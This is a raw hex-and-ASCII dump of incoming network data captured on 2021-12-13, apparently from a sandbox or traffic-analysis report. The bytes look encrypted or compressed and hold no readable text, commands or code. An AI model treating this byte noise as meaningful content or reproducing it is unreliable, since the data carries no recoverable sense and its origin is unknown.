                                                                                              2021-12-13 23:57:16 UTC5711INData Raw: c8 ae 0e 82 c4 63 92 d9 c1 79 c0 4b aa 46 58 85 ed d4 32 25 2f 36 a9 51 e2 df 6d f5 4d b0 5f 3d fd 67 c5 e3 ab bf 86 c1 4c 2c a6 0b 9e fd 6a f9 ff 90 b3 2b cd 5d 0a 24 12 3f 78 fe 67 08 84 b3 90 73 ec 1a 31 36 c4 02 7e e4 77 d6 e2 3b 1d 75 2f ca 1c 8d 87 9b fd 59 39 40 e2 eb e6 fc 25 0a 68 44 b3 7a 61 2a 61 51 25 62 fa f8 ba ff bf 6a a0 e0 6a 44 40 51 7a f1 3d 1e d7 fd 65 42 bb d1 ca b6 f2 20 13 26 ea 31 25 83 d6 cf 3e 53 f9 d3 67 74 bc 34 2c 21 01 7d 81 d4 17 ae 21 ee ce 12 7a 4e c6 4b 9c 99 06 ec dc 2b a3 4f c1 f4 20 f3 43 a0 6e fb 57 bf 0c dd 01 b8 2c be a7 27 a5 8f 93 f4 06 31 c5 6f 44 a1 1b c9 6e a0 af a9 79 86 d9 1a 52 8b 0b df c1 19 9a 2a 97 80 3e db 2c 31 72 c6 b1 97 ec a8 95 8d 3a 54 47 80 bb 0c 89 29 19 da 11 e3 7c 57 45 09 66 74 38 24 a6 99 53
                                                                                              Data Ascii: cyKFX2%/6QmM_=gL,j+]$?xgs16~w;u/Y9@%hDza*aQ%bjjD@Qz=eB &1%>Sgt4,!}!zNK+O CnW,'1oDnyR*>,1r:TG)|WEft8$S
                                                                                              2021-12-13 23:57:16 UTC5727INData Raw: c3 b7 40 f4 5c f0 87 9b 2a a7 ee 49 e9 7d 7e de ee ef 89 e0 aa 23 be 49 dd 34 14 76 a8 3b d7 a4 09 96 74 ae 81 c5 57 f4 10 68 b4 19 39 1f 52 35 37 f2 df 2a e1 7d 9e 97 17 f2 12 13 e1 ae 32 cb a8 a2 87 3f f7 72 e2 c2 e8 fe c8 48 31 ab b8 3f 79 44 b5 47 c4 eb 4d e0 0a 0a dc b7 c2 46 6b 94 1b 60 d7 c8 1d ed cc 96 eb ec ff d2 1c 9b 8f ee 46 47 7b 2e 70 c4 52 c6 63 f4 61 67 a4 3f 72 50 ed 3f f8 39 25 39 85 55 b4 1d 1c a5 7c 3c 2c 36 a0 aa eb 54 36 ec 47 9b 83 69 24 db 53 45 6b fc 95 db 2e 5f 7d 74 f6 02 fc 57 6e 6c 38 58 df 0f de 7f fc a2 95 c5 1f 54 20 a6 7f 49 fb d3 5a ee c4 6a 3b d9 f3 6c e7 bf 0a 52 6f 0d 88 92 06 75 54 2c 83 1a d1 c4 cd 26 67 75 2a 78 e9 04 7b 76 94 c6 ce 5c 21 0b 97 1b 62 30 57 7d b6 43 c8 6f ba db 5e ef e3 c8 df e7 34 99 89 a5 f8 51 09
                                                                                              Data Ascii: @\*I}~#I4v;tWh9R57*}2?rH1?yDGMFk`FG{.pRcag?rP?9%9U|<,6T6Gi$SEk._}tWnl8XT IZj;lRouT,&gu*x{v\!b0W}Co^4Q
                                                                                              2021-12-13 23:57:16 UTC5728INData Raw: 03 54 1d e6 28 13 09 3f f1 c7 07 35 8e db 3a ea f8 7a 8a 47 68 db 5e 21 15 94 bd 60 ee d9 eb 30 08 71 e1 ed b4 a1 06 66 4b ce 2d 3b 8d 58 78 b4 38 ba 7b 00 db 8c 1d 84 ed df 61 d0 2c f7 81 67 43 e0 54 ff 67 f1 35 1a b0 d9 f0 41 4c ad 9b 4c 75 00 25 d2 28 02 17 92 c1 e0 71 cb 92 67 ac 8c 90 4d 4b 2d 8b 5f 52 57 6b ae cb a5 4d 77 26 54 ed a4 98 f5 a4 0c 53 0f ba b3 3a e4 95 c9 7a b0 de 8d 75 38 ab 7b 9f 60 ab d1 71 f0 a3 6c ad 0a ae d1 3a 95 9b ee 76 1d 09 89 00 9a a6 16 a5 66 21 8c 3a 73 e2 e2 46 a5 78 23 cc ab 4d c6 da 51 de 74 43 f8 a2 10 a7 43 3e 7d 4f 5a b4 fc cc f3 8b 4a 1c bf 51 6d 02 5a e8 4a cf 2f 58 58 aa 5c 76 24 e9 ab d0 e7 61 76 8e 4c 71 fa 7e a9 3a c6 37 b7 66 d7 6f 80 2f cb 21 a3 63 cd 46 43 ca 0f 5d fc 4e f9 32 43 b4 4d 6a 18 2c d5 73 f1 6a
                                                                                              Data Ascii: T(?5:zGh^!`0qfK-;Xx8{a,gCTg5ALLu%(qgMK-_RWkMw&TS:zu8{`ql:vf!:sFx#MQtCC>}OZJQmZJ/XX\v$avLq~:7fo/!cFC]N2CMj,sj
                                                                                              2021-12-13 23:57:16 UTC5744INData Raw: d4 fc d8 07 08 f4 3a 33 c9 0b db 3e 0b 70 e3 f5 2c 82 23 0f 99 e0 4c 3b 77 91 68 c5 18 a0 d6 4a b2 91 4e 6d 95 19 8f 0c 75 71 53 25 2a 3b 12 77 22 62 54 2a a5 4d 47 57 d4 92 63 73 ed 6b b4 08 6d ee b1 3a 08 4c bd 58 e5 87 fa c3 8f 01 66 45 dd e5 1d 44 1e 84 65 f9 56 e9 ea d6 af 29 8d 55 63 0d c2 4d cf 97 03 e7 55 4b 59 ee 71 2a 31 76 04 32 a2 0c 12 dc a7 e8 4e f9 09 10 cf 1e 91 6e 40 c2 b3 56 a6 37 ae 8c 79 c6 dd db a8 11 df a3 67 24 7b 8d b0 08 a0 c0 6f b8 81 f0 cb fb bb 5c 5d c9 7a b7 9e c2 b3 6f 05 ab 61 1d 28 8d 7a 64 f0 a0 d6 73 7a 8c 3e 3c 24 03 19 61 3d fb 28 14 00 34 21 4a c8 44 c6 63 7f 59 06 77 69 f1 ac 2a 4e 32 f9 ad 1d 91 05 11 b5 1a b9 9d 91 19 66 cf 13 15 02 bf 95 64 5b d6 d3 75 0e 17 36 2e b1 04 e9 3d 52 9c ea 14 aa 5f 57 ea 76 89 8e 5f 2b
                                                                                              Data Ascii: :3>p,#L;whJNmuqS%*;w"bT*MGWcskm:LXfEDeV)UcMUKYq*1v2Nn@V7yg${o\]zoa(zdsz><$a=(4!JDcYwi*N2fd[u6.=R_Wv_+
                                                                                              2021-12-13 23:57:16 UTC5745INData Raw: a1 74 30 4c ac 23 21 82 86 a7 b2 56 29 1e 86 4c 9b ff cf da d2 5a d4 98 58 30 ec 6f d1 e7 f0 58 4c f9 a9 b8 35 cb c7 17 e0 f4 d2 a1 95 bb c0 32 a2 78 c5 aa 1c 76 85 8d 2a 41 a0 fc db ea 17 1a 28 66 72 02 a9 07 b6 bf 8c a8 21 ab 32 bd 5f 4b 84 3f b3 ce 7d ee e9 c9 6b 44 8e b7 20 a1 db 44 7f 87 b0 de 2f bd ad 88 ab 16 dc 65 6c 52 fa ea cd 40 c9 d7 0e e0 5d b2 2d 14 04 47 e1 b8 52 88 66 ab 2b 36 28 44 51 b4 b0 9a 39 9f 1e 04 db ab af 6f b0 04 fc 58 ec aa 44 6c 35 f5 ff 5f 22 b3 2f fb 40 eb 53 1a 65 63 f1 ab 8e 6d 11 c3 a5 c2 0e 44 64 ea 54 fd 28 ff a6 34 52 fc 38 98 0e 50 53 a9 e5 9a 87 16 bc e2 21 3b 3f 69 bc d5 3c e3 c4 00 2b 37 76 f8 07 80 86 b9 b2 25 8c ff b9 2d 50 ec e9 67 db 9b d5 8a 00 8a ec ad 08 9d 66 13 b0 b6 9f d1 d3 2c 18 34 77 7f 37 f9 27 d1 e6
                                                                                              Data Ascii: t0L#!V)LZX0oXL52xv*A(fr!2_K?}kD D/elR@]-GRf+6(DQ9oXDl5_"/@SecmDdT(4R8PS!;?i<+7v%-Pgf,4w7'
                                                                                              2021-12-13 23:57:16 UTC5761INData Raw: ba f7 4c a6 cd a3 00 cb d6 07 6f 20 dc 20 da ef b7 29 e9 4a 30 1b 6e 6a a8 83 9b 30 03 dc bd 35 eb fc ae 98 25 df 2b 6f 90 85 ef 50 63 75 6e 2b c2 60 ec 01 76 74 6d 0d 44 31 26 13 48 34 ef bf 6c 7a 24 81 84 48 e9 a7 f3 a8 64 e2 82 87 a9 01 8f d4 88 55 22 d2 d5 da 6e f2 f7 6a c3 82 2b 4b a8 19 bc c2 9e e0 14 89 67 57 07 9e 34 f3 18 87 9a 58 e6 cc 9b 1a f2 b4 47 63 47 96 4a f1 e3 58 51 fd cf b4 46 47 17 c5 9b a8 d0 b4 7c a0 4d 92 73 b4 a1 ae 63 d4 90 02 1b 5a 88 9e 7f 22 7a 24 b7 d5 02 16 fb 55 c2 1d 26 5c 8f 08 a6 de a6 66 c2 f2 5d 6f 29 90 86 88 70 ac d1 d4 9a f3 3b 55 61 b9 d6 83 66 d2 28 2d 87 34 fc f7 e5 c4 db 9d fc f6 fe d2 1e 8e e9 aa f9 7e 70 af c2 0c 7e 3c ef 9a a1 79 8a 80 62 25 0d 13 b7 6d 09 f5 14 f9 cd 4d c5 64 c0 fa 9d 60 bf f6 d5 d5 64 76 70
                                                                                              Data Ascii: Lo )J0nj05%+oPcun+`vtmD1&H4lz$HdU"nj+KgW4XGcGJXQFG|MscZ"z$U&\f]o)p;Uaf(-4~p~<yb%mMd`dvp
                                                                                              2021-12-13 23:57:16 UTC5762INData Raw: cb e6 50 67 25 30 0d 3b 81 fa 65 a0 3b 40 0c 03 cb cc b6 a4 52 91 08 64 77 34 9e a7 8b 91 32 f0 b2 20 7e ec ab 51 3b 2e c9 2b 94 53 8d 93 e7 32 c2 67 7f 9a fd 00 20 e2 0e d0 cb e6 85 16 5b 6d 1e ac 6f 30 a8 01 d8 73 40 5f 67 a7 6f d6 54 63 42 a0 1e e6 54 87 de 50 98 d8 76 e8 55 68 61 ab f7 e5 2a 00 a6 b4 c9 8b f3 af db cd 9f b5 b5 ad b5 6c d4 5a a5 8b a6 80 a0 05 d3 a7 6f b0 d1 52 aa aa 6b 78 29 91 8f 69 ca 4c af 63 18 67 1a 9a 73 28 b8 99 6a 9c c2 d2 13 ee 7d 32 b5 76 97 43 18 f4 41 f2 a0 08 f4 36 a8 60 24 32 a1 53 18 da 0e 32 fb 05 a3 b0 99 6e 24 e3 38 f5 33 13 02 61 cf 7c 61 76 e5 22 5c a2 b4 88 0a f4 5c 55 13 5d e5 af fe 02 7b d8 76 d0 3e 42 27 eb 7f cb e4 c1 ac 4c 03 66 b8 6d b0 8a 51 0d 80 c9 49 6b 31 fe c6 c2 c7 3a b1 4c ce 0b 30 91 d0 f6 13 d6 bf
                                                                                              Data Ascii: Pg%0;e;@Rdw42 ~Q;.+S2g [mo0s@_goTcBTPvUha*lZoRkx)iLcgs(j}2vCA6`$2S2n$83a|av"\\U]{v>B'LfmQIk1:L0
                                                                                              2021-12-13 23:57:16 UTC5778INData Raw: a1 81 85 83 fe 76 21 51 dd 5a 47 38 9b 0a b1 d6 9f 7f 01 a2 2f cd 02 c0 27 53 01 7b d0 f5 ed 8a a1 91 e3 13 4f e4 32 9f 98 41 96 af 49 c5 fe 4e 6e 54 1d 42 76 47 24 7f 8b 4d fd 7c 59 c7 51 36 9a 6b c4 61 95 ad ad 58 08 26 c9 64 9d 5b 19 e9 44 15 93 78 99 4b 9c 3f 4b d7 14 88 5b 36 c5 de ca 6f 94 ca 92 23 f7 d5 1a 01 0d c9 15 85 f4 6a 86 6a 6f a9 50 9c 21 11 d4 0c 41 83 22 d2 16 fa 81 4b b8 74 65 9a 31 18 b9 f6 36 4b b7 10 d8 39 f8 2f b0 0b 1a 13 d7 4d 4f 5b c1 8c 78 47 bf 3c 85 ec d8 27 a8 b9 af 11 12 77 36 24 77 9d 9e c4 44 b5 5a 5a a3 c6 8f 5a 8c 27 2f 78 dd 33 6a 7b e6 dd 16 2d 5b 45 1a cf fa 5c ae b8 e8 d7 95 25 56 2a 99 15 38 b3 50 03 17 7d 7b b6 c3 c5 1c a5 ca 30 ff cf 34 6d 88 ea f8 27 57 06 0a ac 05 c4 1c c6 e6 ab ea e6 af a8 b6 ab 33 7d 43 c1 7e
                                                                                              Data Ascii: v!QZG8/'S{O2AINnTBvG$M|YQ6kaX&d[DxK?K[6o#jjoP!A"Kte16K9/MO[xG<'w6$wDZZZ'/x3j{-[E\%V*8P}{04m'W3}C~
                                                                                              2021-12-13 23:57:16 UTC5779INData Raw: f8 4e e6 1b f0 02 f5 60 0f 08 e0 35 01 18 d1 d9 fe 27 f2 1d 4d 23 db ab b2 d9 f9 24 07 a4 bb 8b e3 38 c0 0a 5c b7 35 20 e7 49 05 8a 05 1e 48 1d 62 6d 73 56 1e 22 c1 07 93 e1 0f 28 54 73 79 41 e9 62 27 30 a0 22 65 57 17 5f ae 0f b2 82 e4 3d 79 d5 57 d8 a3 0a 34 dd 21 66 13 13 00 f8 fd 8d a9 e8 e2 ca b1 ec 3b 1b ee a1 8d 85 8e 93 7f 2a 28 26 a5 67 fe 47 36 bb 40 80 37 2a f5 86 d1 a8 5c 3b 76 76 ac 0a 84 2b 7c 4f 3c 6b ed 8d 5b 58 e4 74 95 ae 97 88 6c 6b 71 32 3f 22 4a 1b 94 15 6e 35 c5 69 02 06 ba d1 f0 03 d6 df 2b c0 25 f5 40 71 ef 79 a7 05 ac 6c 02 a4 c1 00 b0 9a b9 99 3c eb 4e 08 e8 dd 81 db 6d 26 c5 f0 52 ae fc 4b 06 78 73 6c d2 e9 07 3e cf 94 b6 9f 5a 2b f1 1e a6 88 7d 59 d5 a0 96 28 8e cd 7e 98 7b a1 90 09 95 ef d3 1a 4f f8 9f 71 cb 35 5a c3 db d5 bf
                                                                                              Data Ascii: N`5'M#$8\5 IHbmsV"(TsyAb'0"eW_=yW4!f;*(&gG6@7*\;vv+|O<k[Xtlkq2?"Jn5i+%@qyl<Nm&RKxsl>Z+}Y(~{Oq5Z
                                                                                              2021-12-13 23:57:16 UTC5795INData Raw: 20 55 78 73 ee 92 75 fc 1a 38 37 9b f2 6b 3c 2c 31 01 98 b5 3b c8 82 70 e0 4a 53 10 e1 8b ba be fa 27 73 59 18 be 18 ab a5 03 36 16 be fa 68 c2 be 5c 87 e8 5e 25 0d b3 20 9b 17 91 16 16 33 bb e9 8a 46 20 a0 b2 7b 21 42 5f 20 01 db d0 87 e6 f6 4b 71 e0 fe 4b 70 6e 13 58 75 a3 90 95 8e 06 9b 9b a7 e1 5d 90 d0 4c 9f ff e1 00 1f aa 23 94 cd 91 06 e5 7c 6c 04 d0 54 f5 ac 34 a6 8b d9 63 57 d2 af 5a ec ec c3 f4 32 de 29 33 9a d2 0b 1f 96 da 40 c3 eb c3 5b 2c a8 01 9d b7 2c d3 4b d1 96 1a f6 b8 af a9 72 b8 6b ac 22 d3 5f d5 1d 81 17 b5 2d bc 3d 95 37 99 46 b8 ff ff 84 2b b2 14 d4 00 5a 78 56 4c c8 76 36 80 61 5f c1 d7 fe 6d a4 b2 e3 77 6c 02 4f 2a 3f 73 78 02 64 16 7b 53 88 9d 98 3d 57 6c 8c e8 b6 c8 b3 46 68 58 67 f2 44 bc d5 7a 5b ee b1 ad 54 57 4f 2c 7e 47 8b
                                                                                              Data Ascii: Uxsu87k<,1;pJS'sY6h\^% 3F {!B_ KqKpnXu]L#|lT4cWZ2)3@[,,Krk"_-=7F+ZxVLv6a_mwlO*?sxd{S=WlFhXgDz[TWO,~G
                                                                                              2021-12-13 23:57:16 UTC5796INData Raw: 70 14 49 d7 4f 27 58 d3 8d 27 56 90 dd 0d 0c be 94 29 98 13 29 ff b1 31 64 e8 be 77 40 19 9e 60 8e 81 3d 1f d1 5f 7a 9a 6d c0 56 38 ba 41 48 37 d4 c0 b6 e0 7a 3f b1 2b f7 d5 00 25 31 d2 3a 34 13 60 7d 3e 1f c7 ca 41 d0 dd 8c 3a 9a dd 2b 75 f5 45 74 e0 81 80 9f a7 18 1d fc 1a be 5a 07 c5 78 06 5d bc f0 a6 83 37 d5 07 1c 46 86 2e 90 14 4c 30 77 6f d2 c7 08 08 48 11 b4 d0 93 3b 32 e0 24 6e 41 1d dc c1 b2 bd 0d 84 c3 ce 9c fe 8e aa 8f b7 a2 b6 51 3e c4 4d 26 ea 38 a4 72 60 26 ca bc 5e 10 08 83 90 52 d6 16 32 01 0d c9 0a f3 1c 5c c3 4c b6 67 15 70 a6 6e 23 63 c3 68 2b f3 cf 28 d8 41 a8 11 e1 8d ef 4c 57 50 3a 8b a7 08 a8 59 36 90 76 2b 96 2d 84 f5 0d a6 e5 0d 73 c6 85 e6 6a f4 6f f4 fa ca b7 6c 98 a7 2f 04 65 17 c2 c7 65 82 fd b0 0e 6b af 79 9c 55 f1 1f 59 41
                                                                                              Data Ascii: pIO'X'V))1dw@`=_zmV8AH7z?+%1:4`}>A:+uEtZx]7F.L0woH;2$nAQ>M&8r`&^R2\Lgpn#ch+(ALWP:Y6v+-sjol/eekyUYA
                                                                                              2021-12-13 23:57:16 UTC5812INData Raw: b8 af d6 ee c2 21 5f 31 9a 36 f5 68 62 e7 e8 24 1a b7 4e e5 27 a9 07 a5 5d b8 7a 3b dd eb 28 33 44 0b 95 4a 96 4d 6b 9a c0 47 32 25 ea 47 5c 66 c6 ce b7 76 04 19 3a 77 d7 6e 7a 50 01 33 8e 98 fb 81 bd c8 13 e4 43 9e 99 0d 4c 36 cf 69 72 58 4f 61 3a 37 be d4 e2 f2 bc 7a 99 5a fc dd 40 57 28 35 be b3 a4 89 27 5c 6e 55 1c 9d 7b 95 36 fb 50 2f 2e 8c f9 88 9b eb c8 b8 fe d6 5d c7 b4 ee d3 d1 8b a8 ee 67 0a c1 d4 a2 80 d0 44 d5 7a 67 ab 14 42 5a fc 92 e0 d5 10 87 5c 69 c1 cd a3 46 19 13 a2 4f 9c a2 4e 08 0a 80 be 75 90 e3 ea de 8d f4 55 62 83 7f 46 ee fa e1 c8 99 79 59 09 ba 39 e1 a7 de ca 26 6b 6d 0c af 74 3e 61 cc 32 76 8e 0b 31 6a eb 68 11 db fe 85 a2 86 3c dc 64 d9 f4 69 6d 4e 93 74 4e 83 f0 60 4c 4d 24 e8 ca 4b dd f2 53 04 c8 f4 d9 71 21 ad 25 1e eb ee 59
                                                                                              Data Ascii: !_16hb$N']z;(3DJMkG2%G\fv:wnzP3CL6irXOa:7zZ@W(5'\nU{6P/.]gDzgBZ\iFONuUbFyY9&kmt>a2v1jh<dimNtN`LM$KSq!%Y
                                                                                              2021-12-13 23:57:16 UTC5813INData Raw: 8e e5 71 0b ba 6b ec e1 8d 93 bb 65 5f dc 2a ba 99 73 6f 0f 48 3b 4e d1 5e 1d 58 50 94 ef 1c 62 e5 e3 19 4e f8 77 ca 55 7f 04 b6 c4 fa cc c0 d5 70 62 c2 ff bf 45 a9 76 19 8a de dc ca 48 df 34 14 5c 63 ce 3b b3 7b fd bd b2 13 a7 6c 87 e8 d3 86 60 75 11 43 2b 97 63 21 cb 92 27 52 fb 12 19 fa ce f4 5f 88 31 e9 bd b8 a0 42 f3 a9 3e 5c eb ef bd fb af 6e e2 01 8c a0 81 ff cf 1e d9 7a 33 e2 84 bf 8f ce be 56 0e 2b d0 f5 8c 63 b1 9c a9 25 8f 12 7e 78 39 b5 08 0b cd 0d f3 48 6d 86 e1 85 48 f8 fa 07 26 75 d1 cc e5 d4 b5 8a e1 24 91 1a 4a 96 b6 7d d7 84 50 ec ea be 18 98 6f 26 02 4b 1c da cd 5d 13 b4 f2 39 ba 47 aa d3 21 56 f8 34 bf 2d b7 9f de 61 42 42 9a 37 75 e9 0a c6 21 80 f7 56 44 8d 1c b9 a7 df d3 7f cb 6b a2 13 e1 e0 28 a8 bb 72 b0 19 82 38 21 5b 44 a9 50 c5
                                                                                              Data Ascii: qke_*soH;N^XPbNwUpbEvH4\c;{l`uC+c!'R_1B>\nz3V+c%~x9HmH&u$J}Po&K]9G!V4-aBB7u!VDk(r8![DP
                                                                                              2021-12-13 23:57:16 UTC5829INData Raw: 8a 8a 12 41 e1 b8 20 0e ff f0 29 cd 4a 67 d5 23 bc a8 c1 73 71 f7 ac 35 ad 8d 3c 88 7d d1 23 f4 40 dc fd 3e 55 43 44 5c 69 19 b1 f5 7f 42 e0 18 4a 4c 58 82 99 56 c6 88 a6 d4 5f 51 96 49 99 bb 72 b5 89 a6 bd be 1e c9 30 c2 c6 62 ee ff 70 c4 cf cc da b3 75 40 cb 38 68 9a c2 0e be 2e 83 d1 c8 51 20 4c df a1 1c df b0 c9 69 11 fa 82 0f 52 c5 53 05 cb 84 c0 af 1d 15 bb 5d ed ae 0f 48 6f c1 5f 53 ec 15 60 3b b1 de c8 19 6a 31 08 83 2e 9d c7 f4 00 fd f2 43 77 a1 3d 82 6d d4 cf 80 a7 64 ed be 0f 73 41 84 dd 77 85 77 ce e3 3d 34 af 52 06 b1 ec d6 1c f7 38 4f 27 87 60 d1 57 39 eb 68 3f 9d ad 5b 29 2f e2 50 d3 52 fa 9d ae 97 7c 14 da 55 d3 0d c3 95 69 9c 83 50 ea 60 48 66 22 6d 44 1a 5d 80 3c 58 a2 b5 06 1d 21 f3 cf d4 96 cf 6f a4 64 bd 35 7e 58 63 66 4c 30 ca b3 34
                                                                                              Data Ascii: A )Jg#sq5<}#@>UCD\iBJLXV_QIr0bpu@8h.Q LiRS]Ho_S`;j1.Cw=mdsAww=4R8O'`W9h?[)/PR|UiP`Hf"mD]<X!od5~XcfL04
                                                                                              2021-12-13 23:57:16 UTC5830INData Raw: e0 b0 74 b4 de 77 aa e5 08 18 26 cc 39 c7 ba be 29 e8 b5 55 53 88 3a cc fc d8 9c 7c 4d ba af 58 5f 5a bf e3 ef 16 1b 52 62 f5 2b 48 05 47 00 70 e2 18 b4 96 8a f9 a1 f0 b4 2a fc 6a 0b a2 fb 8f b4 0d d4 1a 9c 6d 8a ac 47 90 5c f2 ba 88 ad f0 15 b0 ec 45 ed 95 86 3d c8 a9 88 bc a9 17 e7 1a fe 17 da 01 43 5e c7 d1 4f 44 3f 1d 5b 58 63 05 70 15 c1 7d 89 38 30 c4 bd f9 a8 62 9e 5d e8 08 9d 42 94 e5 2a 91 32 c5 a2 36 5b 77 66 23 af 00 5c 1a 2e 7e 83 5f c3 15 68 c4 1d 70 98 54 74 59 ed 29 79 fe 9c dc 00 8d ac 57 9d 3b a6 f3 18 69 66 38 93 43 05 a5 12 ea c8 5f e4 20 93 5c c6 78 3a 41 53 5f 6d df 4f 73 39 90 e6 4c 47 c9 55 9c 16 cd 64 f0 61 d3 73 54 6d 1e 11 c3 29 f6 95 c0 22 5b d5 7d 81 47 7b 86 7a 8a 18 db 4f 3e e6 68 36 00 3b a0 e5 1e b7 c1 2c d2 f2 2a 83 07 55
                                                                                              Data Ascii: tw&9)US:|MX_ZRb+HGp*jmG\E=C^OD?[Xcp}80b]B*26[wf#\.~_hpTtY)yW;if8C_ \x:AS_mOs9LGUdasTm)"[}G{zO>h6;,*U
                                                                                              2021-12-13 23:57:16 UTC5846INData Raw: 16 c4 67 67 39 6e 83 b9 80 4b 9a ce 46 25 a4 02 d6 b3 32 83 92 09 ec ef 59 f3 2e 66 78 08 c5 e7 eb 36 b7 30 14 28 de 9b a6 d7 df 3b 18 ce 99 1e f3 65 dd 37 9b 2e fa 0c 65 1a 49 b4 e7 d9 a7 13 66 70 0e f6 22 59 ec 03 5e ec 1e 7c 8d 3d 49 9e 5e 35 8b 19 0b 10 8c 4c a2 02 60 bb f3 33 b1 36 cf af bf 13 92 0c 66 9b e4 88 fd 8c 89 3e 3a 99 0d 13 34 b0 b1 93 f2 1f 0f f5 26 ed c3 71 4e 11 85 c6 6f e8 16 38 4d cb ef a9 eb e5 2b 49 09 4c e2 53 9e 65 e0 29 29 fb 0a c7 19 33 1d d1 5f fe 1c 61 77 48 f3 3a 42 67 43 42 55 07 8a 2d 0a 96 f5 01 dc 77 96 41 a2 7b dc 81 63 3a cc f8 6a 72 23 69 6c 80 9a f5 ef ea c3 dc bf 80 10 d3 46 6a 15 fe 60 03 c9 19 fe 73 c7 04 de c4 bf 2c 9c 38 f4 fe c7 1f dd 93 2d 42 33 28 8b eb 2f 33 5e 42 ac 02 63 56 9b b0 9f a6 68 6b e3 af 13 3c 45
                                                                                              Data Ascii: gg9nKF%2Y.fx60(;e7.eIfp"Y^|=I^5L`36f>:4&qNo8M+ILSe))3_awH:BgCBU-wA{c:jr#ilFj`s,8-B3(/3^BcVhk<E
                                                                                              2021-12-13 23:57:16 UTC5847INData Raw: 5e a8 bc 69 ab 59 8f 47 fc 53 4c be 02 31 15 07 aa 87 5e 4a e6 f5 8a 36 d1 8c f1 d4 77 2d 9c 4a 01 ea d4 bb a1 56 85 1c 95 31 30 23 2b 43 78 90 4b fe 7a ff 50 7a 67 72 43 8b ff a2 da 68 c2 bd 33 8c 0c 50 76 68 3f 24 49 66 39 bf 2e 0e 8c 58 de d3 12 c8 f5 0d e5 7d c6 12 53 9f 84 c2 33 e6 a9 fe 20 66 8b b0 39 c0 af a6 0a 01 c0 c9 f0 b9 09 24 f4 00 b7 b0 4b cd d6 bc e5 0e 68 0a d6 e6 83 6a 47 eb dc c9 b4 2b 22 cf e1 b5 73 a5 f7 f7 bc 7a 66 4a f2 cd 08 57 c5 c1 11 07 28 4d d5 45 99 b6 9b dc b4 38 73 48 4e 55 c9 ee 13 2f 29 aa c0 2a 87 92 de 71 97 70 3c d8 69 1e 36 0a 08 6f 75 39 d3 55 fe f5 35 5b d9 6c 13 06 fb 0d 05 56 e1 37 47 08 f3 81 1d bd cf 2c 62 96 ea 59 a4 e4 29 10 db 7e f5 b2 f9 df c3 39 09 14 33 0c c5 5f 4c 0e 26 4e 9a bb 4c 2c 46 82 0f 12 73 03 a2
                                                                                              Data Ascii: ^iYGSL1^J6w-JV10#+CxKzPzgrCh3Pvh?$If9.X}S3 f9$KhjG+"szfJW(ME8sHNU/)*qp<i6ou9U5[lV7G,bY)~93_L&NL,Fs
                                                                                              2021-12-13 23:57:16 UTC5863INData Raw: 05 79 f5 1a 88 47 62 22 11 ce c5 65 17 11 17 9e f3 00 49 b1 b7 2e 29 85 98 cb b8 cf 73 19 23 20 8b 2b a9 68 ac 12 70 c2 f0 63 81 a3 3b 4c e7 70 73 94 28 27 0c 07 7d 07 34 1c c4 27 b2 19 61 b3 34 0a 7c b4 6b 75 72 8a 85 78 7e d8 37 dc fb 87 42 1a cf cb 5b dc 18 f1 30 f4 09 a1 7e 03 54 c3 13 4f dd e1 cd 94 f2 e6 36 7f ff 3a 11 1e 3a 98 91 cd e0 7d ec ee fb e6 5f 40 15 e7 e9 9f 36 91 79 8b 57 3f d9 c4 a3 67 a1 40 08 6b bb dd 31 a1 47 90 f3 3e 3b 66 15 d8 c8 f7 7f dd ce 6b 9a 57 e8 25 5e f1 25 99 ab b3 d0 82 75 d1 63 f9 6f 35 81 97 d9 69 49 0e 56 4c aa 2d 32 d6 3d de 81 00 07 d7 3d 69 77 21 ca 44 84 34 8f d5 ff 95 94 a6 c4 42 eb 9c b5 45 af 26 e4 34 df b4 be f8 42 c4 ee a9 07 be 43 a9 37 9b 79 e5 b4 69 34 8b ce 52 8e 3b 5d 73 fb e2 74 53 62 a5 88 27 b7 e3 f1
                                                                                              Data Ascii: yGb"eI.)s# +hpc;Lps('}4'a4|kurx~7B[0~TO6::}_@6yW?g@k1G>;fkW%^%uco5iIVL-2==iw!D4BE&4BC7yi4R;]stSb'
                                                                                              2021-12-13 23:57:16 UTC5864INData Raw: 25 be 3b cb 38 a4 02 28 3f 43 3e fa 8c ef 2d 6e e8 fc 78 ea 19 df e8 25 eb 99 7e be 07 ac 4c a0 fe 72 6c fe b7 66 b0 33 18 6c 81 5e b5 63 1b 6e 82 b9 8a e8 a5 ee ec 59 88 ce 11 3e 0d 99 f0 a8 e5 7d a5 f0 63 8d 81 2c 90 45 bf 86 34 6b a1 74 88 fc bc 7f 33 b6 39 b9 26 7b a0 67 55 18 8a 33 d1 c5 86 61 46 96 09 3c 5a 50 71 a2 dc 20 d3 7a bf cb 8c 3c 5b 72 49 d4 be 0f 77 4e 4c c9 65 4a 3d a8 15 37 06 12 5f b5 e6 61 59 c2 ad 8f 56 ea 24 f3 51 d7 04 b2 45 72 45 d0 5c 6c 66 df 53 12 cc 68 e5 ed b0 af db b0 16 c0 65 22 da 3e 9d 21 42 d3 9c 4b ae 4e 69 1a a1 7c fe 9e 90 5c 10 43 39 8e b7 d7 94 f9 0f f7 23 75 00 41 19 3b c9 4a 79 5f d0 d0 d8 0f 37 b7 7e 5e 8c aa fe 9e fb 1e 4a 81 9e fe 51 9b 74 06 f7 9a dc 05 74 2f 61 5f 64 90 e3 14 e1 b1 b6 4c c7 e4 24 5f 28 0b 5c
                                                                                              Data Ascii: %;8(?C>-nx%~Lrlf3l^cnY>}c,E4kt39&{gU3aF<ZPq z<[rIwNLeJ=7_aYV$QErE\lfShe">!BKNi|\C9#uA;Jy_7~^JQtt/a_dL$_(\
                                                                                              2021-12-13 23:57:16 UTC5880INData Raw: be f4 a2 73 19 70 1d 4b d7 bf c9 f1 f0 0a 9c 69 a3 84 7b 97 b1 2c a5 3c 54 25 69 72 0d 69 71 c1 3e 4b 42 44 5f 5a 05 9f 68 3e 9e a4 7f 02 06 aa dd 9f ea 59 78 0f 32 05 85 de 7f cb 9d 7e 02 52 15 f9 ee 3b 56 b2 65 d0 34 98 94 2a 50 de f1 66 24 21 8c 48 47 0b 78 46 1c 72 21 f5 b3 15 fd 83 df a8 7d 80 7e cf 71 af 54 cf b7 d2 5a ea fc d8 62 da d5 63 40 f8 be 5d d1 7f 50 a9 31 98 da 38 17 bc 7d cb 8c b2 ff d1 0e ae 90 82 a0 5b c8 20 43 16 52 f8 02 d0 21 70 22 55 7c e8 da c1 0d 9b 5a ff e7 bb 41 32 24 71 fd 2d 4b 0a d3 18 4a 0b 8b 0b 73 55 01 24 a4 89 16 6a 89 c7 79 f3 68 92 89 26 e9 58 b0 3a 72 